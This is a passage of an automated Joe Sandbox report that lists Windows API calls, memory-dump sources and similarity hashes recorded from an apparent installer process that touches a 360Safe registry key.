                                                                                                                                                                        • Part of subcall function 5F4FE53F: GetLastError.KERNEL32 ref: 5F4FE600
                                                                                                                                                                        • Part of subcall function 5F4FE53F: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 5F4FE628
                                                                                                                                                                        • Part of subcall function 5F4FE53F: GetLastError.KERNEL32 ref: 5F4FE632
                                                                                                                                                                        • Part of subcall function 5F4FE53F: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 5F4FE64B
                                                                                                                                                                        • Part of subcall function 5F4FE53F: GetLastError.KERNEL32 ref: 5F4FE658
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501F6F
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501F74
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CountCreateTickTimerWaitable$Exception@8H_prolog3_catchMutexThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1909352761-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 001B56D5
                                                                                                                                                                      • CreateWindowExW.USER32(?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 001B5746
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3732789607-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0017DBA8
                                                                                                                                                                        • Part of subcall function 001E4656: RaiseException.KERNEL32(?,?,?,001680B1,?,?,?,?,?,001680B1,0023F5B8,0023F5B8), ref: 001E4698
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 0017DBBE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionException@8RaiseThrow_wcsncpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3304455579-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001B2F39
                                                                                                                                                                        • Part of subcall function 00197451: BeginPaint.USER32(?,?), ref: 0019746E
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B2F66
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                        • Part of subcall function 001A6537: GetWindowRect.USER32(?,00000000), ref: 001A6554
                                                                                                                                                                        • Part of subcall function 00197395: BitBlt.GDI32(?,?,?,?,?,00000000,?,?,00CC0020), ref: 001973B8
                                                                                                                                                                        • Part of subcall function 00197395: SelectObject.GDI32(00000000,?), ref: 001973C3
                                                                                                                                                                        • Part of subcall function 00197395: DeleteDC.GDI32(00000000), ref: 001973E0
                                                                                                                                                                        • Part of subcall function 0019747C: EndPaint.USER32(?,?), ref: 0019748C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectPaintRectSelect$BeginClientCompatibleCreateDeleteH_prolog3_ViewportWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2413813215-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 533350023-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0017898E: RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 001789A8
                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,001CEAA4,?,0017BD49,00100000,00000000,0000008C), ref: 001D20EE
                                                                                                                                                                        • Part of subcall function 00178940: RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00178967
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateCriticalInitializeOpenSection
                                                                                                                                                                      • String ID: SOFTWARE\360Safe\softmgr\dio
                                                                                                                                                                      • API String ID: 2223640745-1814773269
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0017ADE3
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000004), ref: 0017ADF3
                                                                                                                                                                        • Part of subcall function 0017995E: __EH_prolog3_catch.LIBCMT ref: 00179965
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileH_prolog3H_prolog3_catchModuleName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 749528002-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      • __lock_file.LIBCMT ref: 001EAC6C
                                                                                                                                                                        • Part of subcall function 001FD28B: __lock.LIBCMT ref: 001FD2B0
                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 001EAC76
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 717694121-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001965F1
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001965FD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$ClientInvalidate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 645284650-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00183C2A
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000004,0018565F,?,?,?,?,0022D4D1,00000000), ref: 00183C51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeH_prolog3Library
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1631603194-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 001774D1
                                                                                                                                                                      • CoCreateInstance.OLE32(?,?,?,0021E8A0), ref: 001774E9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 001775C1
                                                                                                                                                                      • CoCreateInstance.OLE32(?,?,?,0021E8B0), ref: 001775D9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 5F4D7D5A
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D7D6F
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4063778783-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 5F4D7D0D
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D7D22
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4063778783-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 0017AA58
                                                                                                                                                                      • CreateDialogParamW.USER32(00000081,?,Function_0001A96B,?), ref: 0017AA89
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDialogErrorLastParam
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3445605341-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 001B58A9
                                                                                                                                                                      • CreateDialogParamW.USER32(000000CA,?,Function_0001A96B,?), ref: 001B58DA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDialogErrorLastParam
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3445605341-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00177FFA
                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00178005
                                                                                                                                                                        • Part of subcall function 0016DFB0: __CxxThrowException@8.LIBCMT ref: 0016DFC2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$AllocException@8FreeThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1688122297-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,5F4FCFA0), ref: 5F4DCF0F
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,?,5F4FCFA0), ref: 5F4DCF27
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteFileHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2633145722-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 001EE9D4
                                                                                                                                                                        • Part of subcall function 001F4E30: __getptd_noexit.LIBCMT ref: 001F4E33
                                                                                                                                                                        • Part of subcall function 001F4E30: __amsg_exit.LIBCMT ref: 001F4E40
                                                                                                                                                                        • Part of subcall function 001EE98B: __IsNonwritableInCurrentImage.LIBCMT ref: 001EE99E
                                                                                                                                                                        • Part of subcall function 001EE98B: __getptd_noexit.LIBCMT ref: 001EE9AE
                                                                                                                                                                        • Part of subcall function 001EE98B: __freeptd.LIBCMT ref: 001EE9B8
                                                                                                                                                                        • Part of subcall function 001EE98B: ExitThread.KERNEL32 ref: 001EE9C1
                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 001EE9F5
                                                                                                                                                                        • Part of subcall function 001FAE94: __getptd_noexit.LIBCMT ref: 001FAE9C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 393088965-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • KillTimer.USER32(?,00002711), ref: 0019663D
                                                                                                                                                                      • PostMessageW.USER32(?,000009DD,00000000,00000000), ref: 0019664F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KillMessagePostTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3249405171-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0019665F
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002), ref: 00196672
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_VisibleWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1820326197-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetEvent.KERNEL32(00000000), ref: 5F5017FB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4201588131-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001AEDD0
                                                                                                                                                                        • Part of subcall function 001ABFAE: GdipGetImageHorizontalResolution.GDIPLUS(?,?), ref: 001ABFC1
                                                                                                                                                                        • Part of subcall function 001ABFD3: GdipGetImageVerticalResolution.GDIPLUS(?,?), ref: 001ABFE6
                                                                                                                                                                        • Part of subcall function 001AC0A7: GdipGetPropertySize.GDIPLUS(?,?,?), ref: 001AC0B5
                                                                                                                                                                        • Part of subcall function 001AE07B: __EH_prolog3.LIBCMT ref: 001AE082
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$ImageResolution$H_prolog3H_prolog3_HorizontalPropertySizeVertical
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3577579328-0
                                                                                                                                                                      • Opcode ID: bc48f778cb90b6710d2f5426f747b4d0515c4e1e268f221517aa5297963680a4
                                                                                                                                                                      • Instruction ID: 6c666bb107aa716fbe5c391bc316181fb5ebf5b4dfba32c026837cc988ce0e9c
                                                                                                                                                                      • Opcode Fuzzy Hash: bc48f778cb90b6710d2f5426f747b4d0515c4e1e268f221517aa5297963680a4
                                                                                                                                                                      • Instruction Fuzzy Hash: 04415979D00259EFCF24EFA8D9919AEBBF6EF16310F10452AF512A7241DB30AD85CB50
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      • Opcode ID: 3c1fc08c0208b19e303d8a9d7afd4a0f3e1f5768fd8ed7e4b5ece7d6e2490933
                                                                                                                                                                      • Instruction ID: 26c1be0fb8ff8150e6fe1ce467e0466dd93634493b7ef4c5bb6b2a7311da94eb
                                                                                                                                                                      • Opcode Fuzzy Hash: 3c1fc08c0208b19e303d8a9d7afd4a0f3e1f5768fd8ed7e4b5ece7d6e2490933
                                                                                                                                                                      • Instruction Fuzzy Hash: F5319078A00519EFCF05EFA4D8919BEB7F6FF96340B10401AF4169B292DF309A42CB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D44EA
                                                                                                                                                                        • Part of subcall function 001D42DE: __EH_prolog3.LIBCMT ref: 001D42FD
                                                                                                                                                                        • Part of subcall function 001D42DE: GetDriveTypeW.KERNEL32(?,0000000C), ref: 001D4327
                                                                                                                                                                        • Part of subcall function 001D2158: __EH_prolog3.LIBCMT ref: 001D2177
                                                                                                                                                                        • Part of subcall function 001D2158: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 001D21BD
                                                                                                                                                                        • Part of subcall function 001D2158: _memset.LIBCMT ref: 001D21DF
                                                                                                                                                                        • Part of subcall function 001D2158: DeviceIoControl.KERNEL32(0017BD49,0004D030,?,00000028,?,00000028,?,00000000), ref: 001D2236
                                                                                                                                                                        • Part of subcall function 001D2158: _memset.LIBCMT ref: 001D226C
                                                                                                                                                                        • Part of subcall function 001D3BFD: __EH_prolog3_catch.LIBCMT ref: 001D3C04
                                                                                                                                                                        • Part of subcall function 001D3BFD: CoCreateInstance.OLE32(0022C868,00000000,00000001,0022C798,?,00000038,001D4568,?,?,?,?,?,0000001C,001CEAD1,?,?), ref: 001D3C22
                                                                                                                                                                        • Part of subcall function 001D3BFD: SysFreeString.OLEAUT32(?), ref: 001D3C71
                                                                                                                                                                        • Part of subcall function 001D3BFD: CoSetProxyBlanket.COMBASE(0017BD49,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001D3C88
                                                                                                                                                                        • Part of subcall function 001D3BFD: SysFreeString.OLEAUT32(?), ref: 001D3D26
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$CreateFreeString_memset$BlanketControlDeviceDriveFileH_prolog3_catchInstanceProxyType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3646017727-0
                                                                                                                                                                      • Opcode ID: 54b40b60d17954498afbda6e0be6e75fe6e588cc0dde21e5a9b72b15a5b09ebf
                                                                                                                                                                      • Instruction ID: 94ec1146b063f42eee21530e38cc285c08f3bf14af321b0c9e99e5901ad5f8f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 54b40b60d17954498afbda6e0be6e75fe6e588cc0dde21e5a9b72b15a5b09ebf
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A21E672D0011E9BCF12EFD4D8818FEB7B9AF64350B14402AE921B7251EB359E45CFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,?), ref: 0018EB65
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                      • Opcode ID: f4f2d0d32c541e3af3d6718a308c0d75bd95a346eed3d1e97d580e36d8304156
